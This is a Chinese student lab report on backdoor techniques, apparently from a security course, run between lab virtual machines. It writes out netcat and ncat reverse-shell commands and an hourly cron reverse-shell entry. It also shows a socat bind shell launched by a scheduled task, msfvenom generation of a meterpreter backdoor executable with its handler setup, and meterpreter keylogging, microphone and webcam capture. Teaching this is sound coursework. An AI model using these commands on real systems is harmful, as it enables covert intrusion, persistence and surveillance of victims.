2018-2019-2 网络对抗技术 20165317 Exp2 后门原理与实践

时间:2021-12-30 04:08:27

2018-2019-2 网络对抗技术 20165317 Exp2 后门原理与实践

基础问题回答

  • 例举你能想到的一个后门进入到你系统中的可能方式?
    下载免费应用的时候会有绑定木马。
    浏览某些网页时会有内置的木马程序。
  • 例举你知道的后门如何启动起来(win及linux)的方式?
    Windows:设置为开机自启动、用户直接执行带有后门的可执行文件
    Linux:通过crontab功能将后门设为定时启动;也可以通过对正常软件绑定注入shellcode
  • Meterpreter有哪些给你映像深刻的功能?
    我认为是截屏功能,能随时查看被访问主机的操作
  • 如何发现自己有系统有没有被安装后门?
    定期查杀木马。

    netcat的熟悉

一、win7获取 linux 的shell

1.首先在win7虚拟机开启监听ncat.exe -l -p 5317
2018-2019-2 网络对抗技术 20165317 Exp2 后门原理与实践

2.Linux反弹连接win10 nc 192.168.1.104 5317 -e /bin/sh此处IP为win10的ip
2018-2019-2 网络对抗技术 20165317 Exp2 后门原理与实践

3.Windows成功获得kali的shell
2018-2019-2 网络对抗技术 20165317 Exp2 后门原理与实践

二、Linux获得Windows Shell

1.在kali中使用ifconfig查看IP
2018-2019-2 网络对抗技术 20165317 Exp2 后门原理与实践

2.打开监听nc -l -p 5317
2018-2019-2 网络对抗技术 20165317 Exp2 后门原理与实践

3.在Windows中反弹连接kali,ncat.exe -e cmd.exe 192.168.1.105 5317
2018-2019-2 网络对抗技术 20165317 Exp2 后门原理与实践

4.kali成功获得Windows的命令提示
2018-2019-2 网络对抗技术 20165317 Exp2 后门原理与实践

三、使用nc传输数据

1.Windows下监听5317端口,ncat.exe -l 5317

2.kali反弹连接到Windows的5317端口,nc 192.168.1.104 5317

3.连接建立成功,双方可以相互传输数据
2018-2019-2 网络对抗技术 20165317 Exp2 后门原理与实践
2018-2019-2 网络对抗技术 20165317 Exp2 后门原理与实践

四、使用nc传输文件

1.Windows下监听5317端口,并把收到的数据保存到file1.out中,ncat.exe -l 5317 > file1out

2.kali反弹连接到Windows的5317端口,nc 192.168.1.104 5317 < file1.in

3.连接建立成功,Win可以收到kali发来的文件。
2018-2019-2 网络对抗技术 20165317 Exp2 后门原理与实践
2018-2019-2 网络对抗技术 20165317 Exp2 后门原理与实践
2018-2019-2 网络对抗技术 20165317 Exp2 后门原理与实践

实验内容

一、使用netcat获取主机操作Shell,cron启动

  • 在Windows系统下,监听5317端口
    2018-2019-2 网络对抗技术 20165317 Exp2 后门原理与实践

  • 在Kali环境下,用crontab -e指令编辑一条定时任务,(crontab指令增加一条定时任务,"-e"表示编辑)选择编辑器时选择3(vim)
  • 在最后一行添加26 * * * * /bin/netcat 192.168.1.104 5317 -e /bin/sh,意思是在每个小时的第26分钟反向连接Windows主机的5317端口。
    2018-2019-2 网络对抗技术 20165317 Exp2 后门原理与实践

效果如下:
2018-2019-2 网络对抗技术 20165317 Exp2 后门原理与实践

二、使用socat获取主机操作Shell, 任务计划启动

  • 在Windows7系统下,打开计算机管理,创建任务,填写任务名称后20165317,新建一个触发器,设为工作站锁定时
    2018-2019-2 网络对抗技术 20165317 Exp2 后门原理与实践

  • 在编辑操作中选择你的socat.exe文件的路径,在添加参数一栏填写tcp-listen:5317 exec:cmd.exe,pty,stderr,这个命令的作用是把cmd.exe绑定到端口5317,同时把cmd.exe的stderr重定向到stdout上
    2018-2019-2 网络对抗技术 20165317 Exp2 后门原理与实践

  • win+L或者右键运行,然后用kali输入socat - tcp:192.168.1.104:5317 获得成功
    2018-2019-2 网络对抗技术 20165317 Exp2 后门原理与实践

三、使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell

  • 通过在kali中输入msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.105 LPORT=5317 -f exe > 20165317_backdoor.exe,IP地址为LinuxIP,生成了后门程序20165317_backdoor.exe
    2018-2019-2 网络对抗技术 20165317 Exp2 后门原理与实践

  • 在win7中监听ncat.exe -l 5317 > 20165317_backdoor.exe
    2018-2019-2 网络对抗技术 20165317 Exp2 后门原理与实践

  • 在Linux中输入nc 192.168.1.104 5317 < 20165317_backdoor.exe
    2018-2019-2 网络对抗技术 20165317 Exp2 后门原理与实践

  • 在Kali上使用msfconsole指令进入msf控制台
    2018-2019-2 网络对抗技术 20165317 Exp2 后门原理与实践

  • 输入use exploit/multi/handler使用监听模块,设置payload
  • set payload windows/meterpreter/reverse_tcp,使用和生成后门程序时相同的payload
  • set LHOST 192.168.1.105,这里用的是LinuxIP,和生成后门程序时指定的IP相同
  • set LPORT 5317,同样要使用相同的端口
    2018-2019-2 网络对抗技术 20165317 Exp2 后门原理与实践

  • 设置完成后,执行监听
    2018-2019-2 网络对抗技术 20165317 Exp2 后门原理与实践

  • 在win7上运行后门程序,并且在kali得到了远程控制的shell
    2018-2019-2 网络对抗技术 20165317 Exp2 后门原理与实践

四、使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权

  • 使用record_mic指令可以截获一段音频,可以用-d选项设置录制时间
    2018-2019-2 网络对抗技术 20165317 Exp2 后门原理与实践

2018-2019-2 网络对抗技术 20165317 Exp2 后门原理与实践

  • 使用webcam_snap指令可以使用摄像头进行拍照(由于使用vbox无法使用摄像头,所以并没有抓取到照片。
    2018-2019-2 网络对抗技术 20165317 Exp2 后门原理与实践

  • 使用keyscan_start指令开始记录下击键的过程,使用keyscan_dump指令读取击键的记录
    2018-2019-2 网络对抗技术 20165317 Exp2 后门原理与实践

心得体会

因为参考了学长学姐和已经完成的同学的博客,本次实验并没有遇到特别多的困难,更加深刻的体会到安全的重要性

2018-2019-2 网络对抗技术 20165317 Exp2 后门原理与实践的更多相关文章

  1. 2018-2019-2 网络对抗技术 20165325 Exp2 后门原理与实践

    2018-2019-2 网络对抗技术 20165325 Exp2 后门原理与实践 实验内容(概要): (1)使用netcat获取主机Shell,cron启动 首先两个电脑(虚拟机)都得有netcat, ...

  2. 2018-2019-2 网络对抗技术 20165232 Exp2 后门原理与实践

    2018-2019-2 网络对抗技术 20165232 Exp2 后门原理与实践 1. 后门原理与实践实验说明及预备知识 一.实验说明 任务一:使用netcat获取主机操作Shell,cron启动 ( ...

  3. 2018-2019-2 20165237《网络对抗技术》Exp2 后门原理与实践

    2018-2019-2 20165237<网络对抗技术>Exp2 后门原理与实践 一.实践目标 使用netcat获取主机操作Shell,cron启动 使用socat获取主机操作Shell, ...

  4. 2018-2019-2 网络对抗技术 20165206 Exp2 后门原理与实践

    - 2018-2019-2 网络对抗技术 20165206 Exp2 后门原理与实践 - 实验任务 (1)使用netcat获取主机操作Shell,cron启动 (0.5分) (2)使用socat获取主 ...

  5. 2018-2019-2 网络对抗技术 20165323 Exp2 后门原理与实践

    2018-2019-2 网络对抗技术 20165323 Exp2 后门原理与实践 一.实验要求 (3.5分) (1)使用netcat获取主机操作Shell,cron启动 (0.5分) (2)使用soc ...

  6. 2018-2019-2 20165235《网络对抗技术》Exp2 后门原理与实践

    2018-2019-2 20165235<网络对抗技术>Exp2 后门原理与实践 实验内容 1.使用netcat获取主机操作Shell,cron启动 2.使用socat获取主机操作Shel ...

  7. 2018-2019-2 网络对抗技术 20165311 Exp2 后门原理与实践

    2018-2019-2 网络对抗技术 20165311 Exp2 后门原理与实践 后门的基本概念 常用后门工具 netcat Win获得Linux Shell Linux获得Win Shell Met ...

  8. 2018-2019-2 网络对抗技术 20165336 Exp2 后门原理与实践

    2018-2019-2 网络对抗技术 20165336 Exp2 后门原理与实践 1.基础问题回答 (1)例举你能想到的一个后门进入到你系统中的可能方式? 下载自己不熟悉的软件时含有病毒. 网络钓鱼, ...

  9. 2018-2019-2 网络对抗技术 20165236 Exp2 后门原理与实践

    2018-2019-2 网络对抗技术 20165236 Exp2 后门原理与实践 一.实验内容 (3.5分) (1)使用netcat获取主机操作Shell,cron启动 (0.5分) (2)使用soc ...

随机推荐

  1. myeclipse 注释模板

    选中你要加注释的方法或类,按 Alt + shift + J.  

  2. javascript小实例,PC网页里的拖拽

    几年前,我参与设计开发一个房产网的项目,我负责前端工作,由于项目经理要求比较高,参考了很多房产类网站比较优秀的功能,想把别人比较优秀的设计和想法集合到一起,那时的设计稿和功能实现,简直就是改了又改,今 ...

  3. sqlserver 更改跟踪相关知识

    数据捕获相关文章: http://www.cnblogs.com/lyhabc/p/3383484.html http://www.cnblogs.com/chenmh/p/4408825.html ...

  4. 将TUM数据集的RGB-D数据集转化为klg格式

    1.在github上下载代码png_to_klg git clone https://github.com/HTLife/png_to_klg 2.将png_to_klg目录下的associate.p ...

  5. Linux 典型应用之常用命令

    软件操作相关命令 软件包管理 (yum) 安装软件 yum install xxx(软件的名字) 如 yum install vim 卸载软件 yum remove xxx(软件的名字) 如 yum ...

  6. &lbrack;转&rsqb;论SOA架构的几种主要开发方式

    面向服务架构soa以其独特的优势越来越受到企业的重视,它可以根据需求通过网络对松散耦合的粗粒度应用组件进行分布式部署.组合和使用.服务层是SOA的基础,可以直接被应用调用,从而有效控制系统中与软件代理 ...

  7. openssh升级,打补丁

    以Root用户上传升级包至/home/dou/system openssh-7.5p1.tar.gz openssl-1.0.2l.tar.gz zlib-1.2.11.tar.gz l  安装所需包 ...

  8. 创建Android Apps的30个经验教训

    这个世界上有两种人-从经验教训中学习的人以及听从别人建议的人.这里是我一路走来学到的一些东西,分享给大家: 在添加任何第三方party之前,请三思:这真的是一个成熟的项目吗? 如果一个东西用户看不到, ...

  9. ORM框架之SQLALchemy

    一.面向对象应用场景: 1.函数有共同参数,解决参数不断重用: 2.模板(约束同一类事物的,属性和行为) 3.函数编程和面向对象区别: 面向对象:数据和逻辑组合在一起:函数编程:数据和逻辑不能组合在一 ...

  10. &lpar;转&rpar;Python中的模块循环导入问题

    本文转自: https://wiki.woodpecker.org.cn/moin/MiscItems/2008-11-25 问题 cleven <shenglipang@gmail.com&g ...